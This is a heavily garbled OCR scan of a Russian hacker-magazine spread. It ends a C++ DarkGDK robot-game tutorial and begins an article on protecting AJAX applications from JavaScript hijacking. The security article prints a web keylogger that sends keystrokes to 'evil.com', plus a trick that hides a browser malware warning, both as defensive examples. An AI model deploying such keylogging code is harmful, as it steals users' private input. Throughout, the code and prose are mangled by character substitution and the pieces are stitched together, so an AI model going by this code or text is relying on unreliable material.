кие операции, как: возвращение номера текущего объекта, возвраще- 
ние состояния (жив или мертв, горит или нет), возвращение позиции, 
возвращение угла поворота. Все перечисленные функции -члены не 
изменяют (и не должны изменять] своего поведения во всех клас- 
сах-потомках, поэтому работают они одинаковым образом, прямо как 
п ро гра м м ист- п рое кти ров щи к прописал. Еще в описании интерфейса 
класса имеются объявления трех виртуальных функций, плюс деструк- 
тор (тоже виртуальный]. В нашей программе деструктор можно было 
и не делать виртуальным, поскольку в ней не используются указатели 
на объекты классов-предков. НоуигетЬо ( если кто не догадался , 
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автор любит обращаться к себе в третьем лице, — 

Прим, ред.) решил не отходить от привычного стиля про- 
граммирования и не отказываться от советов мастеров 
ООП. Да, кстати, деструктор сделан чисто виртуальным 
(или абстрактным]. Нуда хватит о деструкторах, перейдем 
ктрем сакраментальным виртуальным функциям: 

1) Функция Бгам ( ) , производящая манипуляции над 
объектом, ее вызвавшим (перемещение, поворот, еіс]. 
Несмотря на название (огам), она не отображает объект; 
воспроизведение сцены происходит послетого, как все 
объекты будут размещены, а потом в глобальной функции 
перерисовки вызывается функция библиотеки ОагкбОК, 
которая и отобразитсцену на экране. Объявлена она вирту- 
альной по той причине, что в классах- потомках переписы- 
вается нетолько тело функции, но и прототип (изменяются 
передающиеся в нее параметры]. 

2) Функция РІауЗоипО (), как и следует из ее названия, 
проигрываетзвук(и] данного объекта, поэтому она и сделана 
виртуальной: в каких-то классах надо будет передавать звук 
в качестве параметра (где может быть несколько звуков); ну 
а в тех классах, где имеется только один звук, параметров у 
этой функции нет. Крометого, в некоторых классах-потомках 
в эту функцию в качестве параметров передаются коорди- 
наты источника звука, но пока не будем об этом. 

3) Последняя виртуальная функция-член — Ріе ( ) объ- 
явлена какчисто виртуальная ввидутого, что она должна 
быть реализована в каждом классе-потомке без изменения 
прототипа. Замечу, что компилятор не выдает никаких 
сообщений, если в классе-предке объявить невиртуальную 
функцию, а затем переопределить ее в классе-потомке. Та- 
ким образом, мы столкнемся с неоднозначностью, которая 
заключается в вызове нужной функции: можетбыть вызвана 
совсем нета функция, вызов которой ожидается! Поэтому 
необходимость ключевого слова ѵігіиаі очень существенна. 
Вообще, компилятор, в принципе, не может (и не должен) 
указывать на неявные ошибки при использовании модели 
ООП. Кстати, он этого и не делает, потому что он не пророки 
не можетзнать, о чем думает и к какой цели стремится про- 
граммист. В определенных случаях «огрызается» линков- 
щик, сообщая об ошибках на только ему понятном наречии 

и выдавая довольно странную абракадабру, состоящую из 
имен заголовочных файлов и функций :). 

Обрати внимание, каким образом уигетбо объявил данные- 
члены и функции-члены. Все данные-члены объявлены со 
спецификатором доступа рго1:ес1:есІ, который делает их ви- 
димыми для функций-членов этого класса (что нетакваж- 
но], а также видимыми для функций-членов производных 
классов. С другой стороны, все функции-члены объявлены 
со спецификатором риЫіс, который делает их доступными 




из любого места программы. Это общепринятый подход 
создания интерфейса с классом: данные-члены недоступны 
извне функций данного класса, а вся работа с объектом про- 
исходит через его функции-члены. Подчеркну: только в этом 
файле (Оаше_ОЬз .Ъ] подключается заголовочный файл 
библиотеки ВагкОВК.к, а все остальные файлы проекта 
подключаютуже наш файл — 0ате_сад .к. 



В РАКЕТЫ 



Взглянем на следующий заголовочный файл — КоскеС . к. 
В этом файле мало кода, и нет ничего сложного. Каки следу- 
ет из названия, в нем содержится описание класса игровых 
ракет, используемых как пользовательским роботом, так и 
врагами. Класс ракет наследует от рассмотренного выше 
основного класса игровых объектов все данные-члены и 
функции-члены, тем самым, приобретая всю его функци- 
ональность. Этот подход дарует нам множество плюсов. К 
примеру, код, написанный однажды (для класса-предка], 
используется всегда одинаково (во всех классах-потомках]. 
Кстати, почитай любую хорошую книгу по ООП! Здесь и в 
остальных наследующих классах наследование открытое 
(риЫіс; если при наследовании неуказать спецификатор 
доступа, то поумолчанию будетзакрытое наследование, 
ргіѵаіе] — мы ведь не хотим, чтобы открытые функции-члены 
в наследующем классе стали недоступными (закрытыми]. 
Заметь, в этом классе не добавляется ни одна переменная, 
переопределяются все виртуальные функции (включая 
деструктор], объявляются два конструктора: поумолчанию 
и с параметрами, а также объявляются две отсутствующие в 
классе-предке функции. 




> ІП^О 

Если тема тебя 
заинтересовала, 
сообщи об этом 
автору, продолжим 
развитие хакерского 
игропрома. 



Н ВЗРЫВЫ 

В рамках этого раздела мы перейдем ктретьему заголо- 
вочному файлу — Ехріосіе.к, содержащему описание 
класса взрывов. Этот класс тоже наследуется отОатеОЬд 
приобретая его функциональность; каки класс ракет, он 
определяет два конструктора (конструкторы вообще по ряду 
причин никогда не наследуются :)). Переопределяются две 
виртуальные функции и деструктор. Третья виртуальная 
функция в этом классе не используется, такое возможно, 
так как в базовом классе она объявлена с ключевым словом 
ѵігіъаі (попросту говоря, виртуальна). Две объявляемых 
функции имеютто же имя, что и в классе ракет, — они 
различаются только количеством (итипом] параметров. В 
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еватель решения (как и проект в целом] дополнился новыми файла 



4 





> СІѴСІ 

На диске лежит 
полный исходный код 
финальной версии 
однопользователь- 
ской игры ОагкРоЬоІ:, 
для компиляции кото- 
рого нужны: Ѵізиаі 
С++ 2008 Ехргезз 
Есііііоп, ОігесіХ 9.0 
50К, ОагкСОК. 



таком случае можно было бы их объявить в базовом классе 
виртуальными, ноуигетбо этого не сделал. Почему? Ведь 
они не используются в классе роботов. Это, впрочем, можно 
сказать и о функции-члене РІауЭоипсІ (третья виртуальная 
функция, неиспользуемая в классе взрывов, но используе- 
мая во всех других классах]. Ноздесьтолько одна функция, 
и автор решил сделать виртуальной лучше ее, чем тащить в 
и без того большой класс роботов неиспользуемый функци- 
онал (две рассмотренные выше функции, которые объявля- 
ются в двух производных классах]. 

0 РЕАЛИЗАЦИЯ: РАКЕТЫ 

Первый по установленному нами порядку класс — это 
Роскеі (соответственно, его реализация находится в 
файле ПоскеЕсрр]. После подключения заголовочного 
файла в нем идут два конструктора: первый (тот, который 
поумолчанию] не используется в нашей программе, но 
должен формально присутствовать — во избежание ошибок 
компиляции. Формален он потому, что имеет пустое тело во 
избежание ошибоклинковщика. В конструктор с пара- 
метрами в качестве значений параметров передаются 
инициализирующие объект данные, которые и присваи- 
ваются данным-членам вновь создаваемой ракеты. Почти 
все используемые здесь функции библиотеки Оагк СОК 
нами уже рассмотрены, поэтому не будем повторяться. Хотя 
стоп, одна не рассмотрена — йЬСІопеОЬзесС! Она ведет 
себя в полном соответствии с названием, клонируя объект. 
Взгляни на условный оператор в конструкторе: если ракета 
№ 1 , то загружаем ее из файла, а все последующие копируем 



с первой, так как он и одинаковы. Таким образом, сокраща- 
ется время загрузки: вместо того, чтобы загружать с диска 
все ракеты, грузится одна, а остальные быстро копируются 
с нее в оперативной памяти. Именно в оперативной, а не в 
видео — в последней хранятся только визуализированные 
сцены, готовые к выводу на экран. После создания объекта 
он скрывается (с помощью функции сіЪНісіеОЪз есд] и 
деактивируется, чтобы быть готовым появиться во время 
выстрела (функция Еіге, — смотри ниже]. Далее идет де- 
структор, который делаетто, что ему и полагается: обнуляет 
все данные-члены, плюс функцией сІЬВеІеЦеОЬзесІ: уда- 
ляет загруженный объект. Следующая функция Вга.™ вовсе 
не отображает объект. Она вызывается при перерисовке 
(на каждом кадре] и производит различные манипуляции 
над объектом, в том числе, проверку столкновения ракеты с 
поверхностью ландшафта. 

Функция Еіге представляет собой место «рождения» 
ракеты, в ней вызываются функции проигрывания звука 
и позиционирования (к месту выстрела] ракеты. Функция 
Роз делаетто, что и должна, — то есть перемещает ракету 
в пространстве к месту старта (выстрела]. Предпоследняя 
функция Оіе не уничтожает ракету, а просто делает ее 
невидимой и неактивной, чтобы не пришлось снова за- 
гружать ее при следующем выстреле (в целях ускорения 
игрового движка и процесса]. Однако, в таком раскладе 
есть и минусы: расходуется память, но если посмотреть 
на комплектацию современного (или даже морально 
устаревшего] компьютера, то мы в подавляющем боль- 
шинстве обнаружим немен ее 512Мб оперативки, а на 
машинах геймеров — не ниже 1 Гб. Поэтому автор решил 
пожертвовать оперативкой в пользу скорости работы, 
ведь игры не могут быть тормознутыми, а если таковые 
найдутся — пиши пропало. Последняя в этом файле 
функция РІауЭоипсІ выполняет два действия: позициони- 
рует (в координаты, переданные в качестве параметров] 
источник звука и, собственно, проигрывает звук (также 
переданный в качестве параметра]. 

г ВЗРЫВЫ 

Класс Ехріосіе, содержащийся в файле Ехріосіе.срр, 
представляет взрывы и вообще крайне интересен для нас, 
поскольку в нем реализуется новый (ранее не используемый 
нами] тип объектов — частицы. Но обо всем по порядку. 
Сначала, когда у автора возникла идея добавить в игру 
взрывы, он полез в интернет, чтобы нагуглитьанимиро- 
ванные х-файлы с огнем (загружаемые нашим движком]. 
Обнаружилось, что таких файлов приемлемого качества 
в Сети нема. Попытка смоделитьанимированный огонь в 
любимой ІхиеЗрасе также неувенчаласьуспехом: частицы 
наотрез отказались экспортироваться в х-файл. Тогда, у 
автора возникла идея: если частицы не экспортируются 
в х-файл, то их надо создать в самой программе. В ОігесіХ 
естьтакая возможность. ѴигетЬо уже собрался кодить под 
голый ОігесіХ (со всеми вытекающими отсюда трудностям и], 
каквнезапно наткнулся на функциюсоченьзаманчивым 
названием — сІЪМакеРагСісІез. Отсюда он и начал 
«плясать» :]. Здесь мы приведем обзор кода из указанного 
файла, одновременно останавливаясь на новых функциях. 
Итак, в начале имеют место два конструктора: один из них 
пустой (который поумолчанию), а второй — инициализиру- 
ет систему частиц. В нем естьтри новыедля насфункции. 
Во-первых, нам надо создать систему частиц в виде огня. 
Пожалуйста, в Иагк СОК для этого есть специальная фун- 
кция — сіЪМакеЕігеРагСісІез. Ей передаются девять 
параметров: число, под которым сохранится создаваемая 
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система (в нашем случае — это константа, которая передается в конс- 
труктор в качестве параметра]. Заметь, частицы — относятся кдругому 
типу объектов, из чего следует, что и нумерация у них своя. 

Второй параметр — номер изображения, которое будет использоваться, как 
искра. В результате, нетрудно догадаться, получится множествотакихискр. 
В нашей программе этим параметром передается числовая константа, за 
которой загружено маленькое квадратное изображение (20x20). Оно пред- 
ставляет собой красный квадрат, посреди которого нарисован желтый круг. 
Издалека огонь-фонтан изтаких искорок выглядиточень эффектно! 

Третий параметр — частота частиц (искр). Не стоитзадавать слишком 
большое число, иначе время загрузки игры возрастет. Разумной кажет- 
ся цифра в 3000. 

Следующая тройка параметра задает положение системы частиц в 
пространстве. Последние три параметра задают, соответственно, 
ширину, высоту и глубину — то есть размеры по осям X, У, 2 . Функцией 
ОЬНіОеРагСісІез мы скрываем систему частиц. Причины такого 
взаимодействия с объектом подробно рассмотрены в предыдущем 
разделе. Последней вызывается функция ОЪРозіСіопРагСісІез, 
которая перемещает частицы в заданные координаты. Впрочем, все 
координаты нулевые. Со взрывами — такая же история, что и с раке- 
тами: при загрузке мы создаем все взрывы, а во время игры показы- 
ваем и скрываем их, когда надо. После конструкторов идет деструк- 
тор, очищающий все данные-члены. Далее следует функция Огаѵѵ, 
которая, как и в прошлый раз, позиционирует объект в пространстве, 
одновременно отвечая за отображение (при равенстве переменной 
аііѵе значению Іхие) и скрытие (в противоположном случае, который 
наступает по истечению 999 мс после появления) взрыва. Функция 
Біе скрывает взрыв (подробно рассмотрена выше]. Следующая за 
ней функция Ріге занимается реинициализацией взрывов во время 
игры. И, наконец, последняя функция Роз позиционирует взрыв по 
переданным координатам, вызывая рассмотренную ранее функцию 
СЬРозіСіопРагСісІез. 

г ГЛАВНЫЙ ФАЙЛ РЕАЛИЗАЦИИ 

В функции инициализации по сравнению с прошлым примером ничего 
не изменилось. Но в главный файл реализации добавилась новая функ- 
ция, название которой — В5СЮ — расшифровывается, как ВІаскВсгееп 
СТ ОеаіЬ. Она вызывается по окончанию игры, в двух равновероятных 
случаях: проигрыш или выигрыш (смотри картинки]. 

Передаваемое в качестве параметра значение — по сути, индикатор 
различия победы и поражения. Благодаря этой функции, в финале игры 
будут представлены разные звуки и изображения. Крометого, она вы- 
водит текст, осведомляющий геймера, что нужно сделать для продолже- 
ния. Она же выполняет обработку пользовательского ввода, соответству- 
ющего ее рекомендациям. 

В функции БагкОВКО кроме создания роботов происходит создание 
всех остальных динамических объектов: ракеты, взрывы. Из-за того, 
что теперь в игре участвуют новые объекты, код главного цикла заметно 
вырос и требует обратить на себя внимание. Сперва мы запускаем цикл 
(их будет здесь множество] по вражеским роботам, в котором прове- 
ряем их состояние: если механический упырьуже «отбросил кони», 
а его ракета запущена, то уничтожаем ее, заодноувеличив значение 
переменной, заботливоучитывающей число погибших врагов. После 
этого цикла выполняется проверка, выясняющая, победил ли юзер. В 
ней, кроме прочего, участвует упоминавшаяся выше скорбная перемен- 
ная. Если количество мертвых механизмов из этой самой переменной 
оказывается равным количеству врагов в общей сложности, — победа 
засчитывается игроку и нам становится необходимо подчистить ресурсы 
и перевести пользователя на экран победы (вызвать В5СЮ :)). Ресурсы 
подчищаются только за динамическими объектами, для этого явно вы- 
зываются деструкторы наших классов. Остальные же объекты оставля- 
ются в покое, чтобы не возникло потом необходимости пересоздавать их 
передначалом новой игры. 

После этого идут проверки и манипуляции с главным персонажем, 
которые были рассмотрены в прошлой статье. Однако и здесь есть 
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свои новинки — это код, в результате выполнения которого геймерс- 
кий робот осуществляет залп огня. Затем, как обсуждалось в прошлой 
статье, идут циклы проверки столкновений между роботами. После этих 
циклов следует новая проверка, которая на этот раз осуществляется 
для выяснения: не погибли под обстрелом юзверский робот? И если 
да, то выполняется код, аналогичный коду конца игры. Затем снова 
начинаются циклы, в которых на этот раз осуществляются манипуляции 
над ракетами: выполняется проверка на столкновения между ними и, 
собственно, мишенями — роботами. В результате вызываются их (ракет) 
функции-члены. Под конец осуществляет свою работу еще один цикл, в 
теле которого происходит обновление взрывов. Взрывы, кстати, созда- 
ются тогда и в том месте, когда и где объект (ракета, робот] принимает 
состояние горения (Ьигп). 

Н ЗАКАТ СОЛНЦА ВРУЧНУЮ 

В конце программы ресурсы, занятые объектами наших классов, 
освобождаются автоматически — мы создали объекты в стеке, и когда 
объект выходит из области видимости, то автоматически вызывается 
деструктор определенного класса, который выполняет предписанные 
ему действия — очищает память, удаляя объект. 

Но кроме объектов наших классов, в программе мы создали объекты, 
не принадлежащие тому или иному самописному классу. И хотя в 
Багк ООК присутствуют функции для удаления объектов любого типа 
(ЗБ-объекты, текстуры, звуки, еіс], при завершении программы вызы- 
вать их не надо. Библиотека сама позаботится об очистке ресурсов, 
занятых ее объектами. Спросишь, зачем тогда нужны эти функции? А 
для того, чтобы очищать ресурсы во время работы приложения, для 
замены или просто перезагрузки их содержимого — как, например, 
мы явно вызывали деструкторы наших классов перед перезапуском 
игры. 

Темнеменее.в качестве эксперимента автор решил написать 
функции удаления объектов и вот, что он получил. Как и следовало 
ожидать, процесс компиляции за вершился успешно, — програм- 
ма запустилась под дебагером. Кроме того, по команде автора 
она спокойно завершил а свое выполнение. Одна ко, в следующий 
раз, когда уигетЬо снова запустил программу, угробил под огнем 
вражеским своего робота, начал игрузаново и попытался прикрыть 
ее... — дебагер запаниковал. И, даже выполняя проверку на сущес- 
твование объекта (функции сОэІтадеЕхізЩ сіЬОЬз есСЕхізС, еіс] 
перед их удалением, дебагер не успокоился. Тогда, углубившись в 
дебри листингов (как сишных, так и дизассемблерных], автор при- 
шел к вышеописанному выводу. 

Н ЗАКЛЮЧЕНИЕ 

В аутсайдерах остался еще один модуль ОігеФХ — это ОігеФРІау. 

О мультиплеере мы, будем надеяться, подробно поговорим в следу- 
ющей статье, где нашей целью будет разработать мультиплеерную 
баталию. ИНИ 
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НИКОЛАЙ БАЙБОРОДИН 



/ ВАІВОВООШ@СМАІІ_.СОМ / 




ІЗАЩИЩАЕМ ВЕБ-ПРИЛОЖЕНИЯ, ПОСТРОЕННЫЕ НА ПОПУЛЯРНЫХ 



АМХ-ФРЕИМВОРКАХ 



Год назад об АЧАХ говорили как о новой перспективной технологии, но се- 
годня он как-то выпал из поля зрения. Значит ли это, что АЗАХ не оправдал 
надежд и постепенно уходит в историю? Нет и еще раз нет. АЗАХ — это тех- 
нология Ъаск-епсі, реализация которой перешла с прикладного уровня на 
уровень фреймворков. 



В ПЕРЕДОВАЯ ЛИНИЯ ОБОРОНЫ 

Лежащие в основе огромного числа веб-проектов йс^о, боодіе ѴѴеЬ 
Тооікй, іОиегу, Ргоіоіуре, в свою очередь, являются дружественной к 
разработчику реализацией АЗАХ. А задумывался ли ты о потенциальных 
брешах в безопасности, прикручивая к своему проекту один из упомяну- 
тых фреймворков? 

Если ты не хочешь отдать свой веб-проект на растерзание стае скрипт- 
киддисов, то просто обязан знать об основной уязвимости АЗАХ-прило- 
жений. Эта уязвимость носитархитектурный характер. Другими словами, 
полноценного решения проблемы не существует и вряд ли когда-нибудь 
появится. Все, что ты можешь сделать — это минимизировать риск 
возможного взлома, предприняв ряд целенаправленных действий. 
Знакомься с мистером проблемой номер один — Нуаскіпд! 

Чтобы эффективно противодействовать этому виду атаки на АЗАХ- 
приложения, неплохо было бы разобраться с тем, как эта ботва 
работает. Если говорить в двух словах, то в основе АЗАХ лежит обмен 
сообщениями между сервером и клиентом посредством ЗаѵаЗсгірІ- 
сообщений. Нцаскіпд нацелен на перехваттаких сообщений (в 
которых можно найти много вкусностей]. Традиционный обмен 
сообщениями между веб -клиентом и сервером лучше защищен 
от подобных атак благодаря технологии 50 Р (5а те Огідіп Роіісу). 



Какой-либо защиты сообщений, формируемых с помощью Заѵа5сгірЕ 
пока не наблюдается. Кстати говоря, это должно быть головной 
болью разработчиков веб-браузеров, но они просто игнорируют про- 
блему (что должно играть на руку читателям другой рубрики нашего 
журнала — «Взлом»]. О том, что проблема не нова, свидетельствует 
следующий факт: достаточно давно существует еще одна реализа- 
ция данной уязвимости, не имеющая никакого отношения кАЗАХ 
— С5РЕ (СгоБЗ-вйе Ведиезі Еогедегу]. Отметим, что применительно 
кЗаѵа5сгірІ проблема становится еще более серьезной, так как зло- 
умышлен ни к теперь может не только изменять, ной читать передава- 
емые сообщения. Демонстрируя серьезность проблемы, достаточно 
будет сказать, что впервые она была обнаружена ни где-нибудь, а в 
самом ОтаіЕ 

Для защиты от атаки типа Ндаскіпд запомни, прежде всего, про- 
стую, кактрехдюймовая дискета, истину — если веб-приложение 
надежно защищено отХ55, это еще не говорит о его защите от 
Ндаскіпд. Чтобы сделать АЗАХ-приложение максимально неп- 
робиваемым, нужно, во-первых, сделать невозможным прямое 
выполнение 35-ответа. Во-вторых, нужно организовать отсылку в 
известном направлении всех кривых или просто подозрительных 
запросов. Начнем со второго пункта. Для того чтобы спалить всех 
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хитрозадых, достаточно будет использовать в шаблоне 
запроса параметр, со слепым подбором которого могут 
возникнуть траблы. К примеру, это может быть иденти- 
фикатор сессии. Всякая ошибка в этом параметре будет 
расцениваться каксигнал о попытке взлома. Если по 
каким-то причинам утебя нет возможности исполь- 
зовать параметры сессии, можно обойтись защитой 
на стороне сервера, настроив его на обработку только 
РОЗТ-запросов. Фишка в том, что задействованный 
при Ндаскіпд тег <зсгір1> подтягивает внешние скрип- 
ты с помощью ОЕТ-запроса. Чтобы сделать невоз- 
можным для злонамеренного сайта выполнить ответ, 
который включает в себя ОаѵаЗсгірЕ приложение клиента 
может воспользоваться тем, что ему разрешено изменять 
данные, которые оно получает перед тем, как выполнить 
ответ (в то время как злонамеренное приложение может 
лишь выполнить его, используя тэг <5СГІрЫ. 

Когда сервер преобразовываетобъект, тот должен иметь 
специальный префикс (и даже суффикс), который сделал бы 
невозможным выполнение 05-скрипта посредством тэга 
<5сгір1>. Приложение клиента можетубратьдополнитель- 
ные конструкции, перед тем каквыполнитьответсервера. 
Существует множество реализаций этого подхода. Мы 
выделим лишь два их них. 



1. Сервер может сопровождать каждое сообщение следую- 
щей конструкцией: 

отЪіІе (1) ; 

Если клиентне вырежет это выражение, то выполнение 
подобного сообщения 05-интерпретатором приведет к 
бесконечному циклу. Способ использовал Соодіе, чтобы 
устранить уязвимость, обнаруженную Гроссманом. Клиент 
проводит поиск и вырезает дополнительную конструкцию: 

ѵаг оЪдесЕ; 

ѵаг гед = п еѵі ХМЬНЦЦрКедиезС ( ) ; 

гед. ореп ( "СЕТ" , " /оЪдеск . д зоп" , Огне) ; 

гед . опгеасОузЦаСескапде = ЕипсСіоп () { 

ІЕ (гед. геасІуЗЕаЕе == 4) { 
ѵаг ЕхЕ = гед. гезропзеТехС; 

ІЕ ( ЕхЕ . зиЬзСг (0,9) == "ѵтЫІе ( 1 ) ; " ) { 

ЕхС = ЕхЕ . зиЪзЕгіпд (10 ) ; 

} 

оЪдесЕ = еѵаі ( " ( " + ЕхС + " ) " ) ; 
гед = пиіі ; 

} 

} ; 



Архитектура АОАХ-приложений 



А]ахіап ѴѴеЬ Ргатеѵѵогкз 

РаІІз, Тарезігу. ѴѴеЬѴѴогк. А5Р.ЫЕТ, ... 



Кетоііпд Тооікі* 

ОѴІ/К, 050 М-Р Р С, с)о]о.іо. Ыпс1() 
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щенный основам 
АОАХ — рекомендую 
для начинающих: 
ги.ѵѵікіЬоокз.огд/ѵѵікі/ 
АОАХ 

• Краткий обзор 
десяти наиболее 
серьезных проблем 
с безопасностью 
АОАХ-приложе- 
ний: ѵѵѵѵѵѵ.пеі:- 
зесигКу.огд/а гЕсІе. 
рбр?ісІ= 956 &р= 1 . 



• Статья АОАХ 
Зесигііу Вазісз на 
ЗесигіІуЕосиз: ѵѵѵѵѵѵ- 
зесигіМосиз.сопп/ 
іпЕосиз/1 868/1 . 



• Там же — интерес- 
ная статья о взломе 
ѴѴеЬ 2.0 приложений 
с помощью ЕігеВид: 

ѵѵѵѵѵѵ.зесигіМосиз. 
сот/іпФсиз/ 1 879 / 1 . 
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^ согііпд 



ОгідіпаІ ОЬ]осі 



ХМІНИрКедиезІ 



$егк1() 
опгеагіубІаІесЬап дв{ } 



орел() 



с 



_Опдіпаі_хтІНир (Іпзілпсе) 



У 



вепсі() 



опгеагіузіаІесЬапде( ) 



ореп() 



ѵаг хііг = пеѵѵ ХМШИрЯеяиезІ() 



-[ хНг.орепГигГ) 






Ні]аскіпд в картинках 



РігеЬид — верный помощник в отладке А^Х-приложений 

// Клиент может искать и вырезать комментарии 
следующим образом: 
ѵаг окдесС; 

ѵаг гед = пей ХМЬНЦЦрКедиезЦ ( ) ; 
гед. ореп ( "СЕТ" , " /оЬд есб . д зоп" , Сгие) ; 
гед. опгеабузбабесЬапде = ІипсСіоп () { 
іі (гед. геабуЗбабе == 4) { 
ѵаг бхб = гед. гезропзеТехб ; 
іб (бхб . зиЬзбг ( 0 , 2 ) =="/*") { 

бхб = бхб . зиЬзбгіпд (2 , бхб . ІепдбЪ — 2 ) ; 

} 

обдесб = еѵаі ( " ( " + бхб + " ) " ) ; 
гед = пиіі; 

} 

} ; 



8В <4іѵ сі»*»»“еепг*пгХор1"> 
в <<Иѵ в1иі< а сін»«іс1пмі1*> 

9 <4іѵ сі*»»»"свпг«п«Іял*г2”> 

Ѳ <йіѵ сіііі^'сопипсіпмгЗ’» 

Й <<11 ѵ с1»«»"*сеп'і«пгІгѵпт*> 

в <» ійу1*-~> 

</м» 

«11ѵ е1»*»""*иЬТі'СІв*> ТЛсидЬг» 

ОЛ І»!«ѵиі (М ііг*.</<*іѵ» 
і <і1ѵ с1кіі**р«9«Х*і4*> 

9 «Ііѵ іа»"ро**000170“ е1«»»»”ЫевРо*і* 
» *Аі'- < ч«- — ,-лллі *•- «ІатЧіІ»!*»* ' 




іопгчі**: 1 . Й 

) 



ІпНсИ(сч) Ігот йіѵ*соп 
всепгвгѵг { 

) 

ІпНегі(е<] <гот ьейу 



гед . зепб (пиіі ) ; 



гед. зепб (пиіі ) ; 




> СІѴСІ 

На дискеты найдешь 
наиболее популяр- 
ные АЧАХ-фреймвор- 
ки: 0о\о, ЭѴѴТ.іОиегу, 
Ргоіюіуре, АНаз. 



2. Сервер может за ключить ^ѵаВсгірІ символами коммен- 
тария, которые впоследствии должны быть вырезаны (перед 
тем, какЧ5-код отправится на выполнение]. Следующий 
ЧЗОЫ-объект окружен символами многострочного коммен- 
тария: 

/* 

[ { " бпагпе " : "Ыісбюіаз " , " Іпаше" : " ВаіЬогобіп" , 
"рбюпе" : "322-233 " , "ригсЬазез " : 60000 . 00 , 
"ешаіі": "ЬаіЬогобіпОдшаіІ . сот" } ] 

*/ 




> ІПІЪ 

Нуаскіпд в переводе 
с английского на 
великий и могучий 
означает нападение, 
ограбление и даже 
угон самолета. 



Что почитать 

Книга посвящена технологии веб-программирова- 
ния Діах, стоящей на ступень выше базовых БНТМЬ и 
ІаѵаЗсгірб С помощью Д іах можно создавать интерак- 
тивные веб-приложения, отличающиеся быстродейст- 
вием и высокой производительностью. Эта книга отве- 
тит на вопрос, как асинхронные запросы используются 
в технологии Д іах, и поможет выйти на 
новый уровень в создании веб-при- 
ложений. Особенностью издания 
является уникальный способ подачи 
материала, ярко выделяющий серию 
«Неаб Ріт» издательства О’КеШу в 
ряду множества стандартных книг, 
посвященных программированию. 







^ РАСПРЕДЕЛЕННЫЕ ПРИЛОЖЕНИЯ 

ИЛИ ЕЩЕ ОДИН КОШМАР НА ГОЛОВУ ВЕБ-КОДЕРА 

С тенденцией, как говорится, не поспоришь. А тен- 
денция сегодня такова, что девелоперы стройными 
рядами двинулись в Сеть, особо не задумываясь над 
вопросом «а нафига?». Трудно себе представить такое 
приложение, для которого бы не нашлось веб-аналога. 
Есть все — от блокнота до целых операционных систем 
с полным набором прикладного софта и продвинутым 
пользовательским интерфейсом. По своей природе такие 
приложения имеют двухуровневую архитектуру — движок 
крутим на сервере, а на стороне клиента через браузер 
реализуем пользовательский интерфейс. Естественно, 
разработчики в большинстве своем не пацаны сопливые, 
а потому понимают, что для серверной части приложения 
наиболее эффективными будут одни технологии и языки 
программирования, а для клиентской — совсем другие. 

К тому же, одна серверная платформа может работать 
ссовершенно разными клиентскими реализациями. 

Что совершенно логично — будь то коктейль из НТМИ и 
ЭаѵаЗсгі рі, или традиционное оконное приложение на 
С#, все они прекрасно найдут общий язык с серверной 
частью приложения посредством ЫТр- прото кола и одного 
из ХМ И-д нале кто в. Но это на бумаге все так гладко, а на 
практике... суди сам. 

Допустим, серверное приложение написано на ^ѵа. В ответ 
на клиентский запрос оно возвращает один из элементов 
своего массива. Только вот в одних языках программиро- 
вания индексация массивов начинается с нуля, а в других 
— с единицы со всеми вытекающими отсюда последстви- 
ями. Длятого чтобы обезопаситьсебя отсвязанныхсэтим 
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Факты о Бо)о 



Факты о Ргоиогуре 

Ргоіоіуре — ІаѵаЗсгіріі-фреймворк, упрощающий работу с Д іах и 
некоторыми другими функциями. Несмотря на его доступность 
в виде отдельной библиотеки, он обычно используется програм- 
мистами вместе с КиЪу оп Каііз, зсгіріі.асиіо.из и Кісо. Заявлено 
что этот фреймворк поддерживается следующими браузерами: 
Іпнегпеі: Ехріогег (ѴѴіпсіоѵѵз) 6.0, МогШа Рігеіох 1.5, Арріе Заіагі 2.0 
и Орега 9.25 (естественно, и их более поздние версии) . Поддержка 
браузеров также подразумевает, что фреймворк поддерживается 
Сатіпо, Копдиегоц ІсеѴѴеазеІ, Иещсаре 7+, ЗеаМопкеу, идр., кото- 
рые принадлежат тем же семействам. 



Именно благодаря своей асинхронной природезапрос пролезет неза- 
меченным сквозь все линии обороны. Вот еще пример: 

бипсСіоп кеуіоддег(е) { 
йосшпепС . ішадез [ 0 ] . зге = 

"Ъ.ккр : //еѵіі . сош/іоддег ?кеу= " 

+ е.кеуСосІе; 

} ; 

сіоситепк . Ъосіу . асМЕѵепкЬізкепег ( " кеуир" , 
кеуіоддег, каізе) ; 

Здесьмытырим приватные данныеуже через другой п роход (ой !] с 
помощью своеобразного веб-килогера, который передает на удаленный 
сервер всю вводимую пользователем на странице информацию. Конеч- 
но, сейчас речь не о том, как мониторить переписку своей подружки на 
почтовике с веб- интерфейсом, а о том, как самому уберечься от подоб- 
ных косяков. 

К счастью, веб-браузеры в последнее время достаточно поумнели, 
предупреждая беспомощного юзера о возможных проблемах. С 
недавнего времени этуже функцию взяли на себя и поисковики. 
Однако, в большинстве случаев все предупреждения выводятся 
посредством НТМІ_. А какты уже знаешь, через АЗАХ I пі есіі о п можно 
перекраивать 00 М -структуру как душе угодно: 

// Бубнилка, предупреждающая пользователя 

<збу1е куре= " бехк/сизз " > #магпіпд { соіог: геб } </ 
збу1е> 

<біѵ іб= "магпіпд " >ТЬе Ііпкз іп ккіз раде шау гекег ко 
рокепкіаііу таіісіоиз ШеЬ радез, зо Ье сагекиі . </біѵ> 

//А вот так ее можно заставить замолчать 
ѵаг е = босшпепк . декЕІешепРВуІб ( " ѵ/агпіпд " ) ; 
е . зкуіе . со1ог= "ѵтЬіке" ; 

0 ПРАВИЛЬНЫЙ АЗАХ 

Как видишь, АЗ АХ- приложен ия имеют много уязвимых мест. Через 
нихнад твоим веб- проектом могут надругаться с особой изощрен- 
ностью, свойственной разве что производителям жестких хентай- 
ко ми КС О в ( будучи злым японским программистом , Николай на- 
верняка знает в этом толк\ — Прим. ред.). Что же делать? Бояться 
каждого чиха за углом и гонять только голый НТМІ_? Абсурд! Все, 
что оттебя требуется, гринго, это усвоить несколько базовых правил 
создания безопасных АЗ АХ- приложений. 

Первое, что нужно сделать, — это позаботиться о фильтрации 



Бсуо (доджо) — свободная модульная ІаѵаЗсгіріі-библиотека. 
Разработана с целью упростить ускоренную разработку осно- 
ванных на ІаѵаЗсгірі: или АЗАХ приложений и сайтов. Разработка 
библиотеки была начата Алексом Русселом в 2004 году. Находится 
либа под двойной лицензией: В5Б Ьісепзе и Асабетіс Ргее Ілсепзе. 
Бор Роітсіайоп — некоммерческая организация, созданная для 
продвижения Бор. Б о] о используется в 2еп<3 Ргатеѵѵогк, начиная с 
версии 1.6.0. 



подозрительных данных. Для этих целей есть два зарекомендовав- 
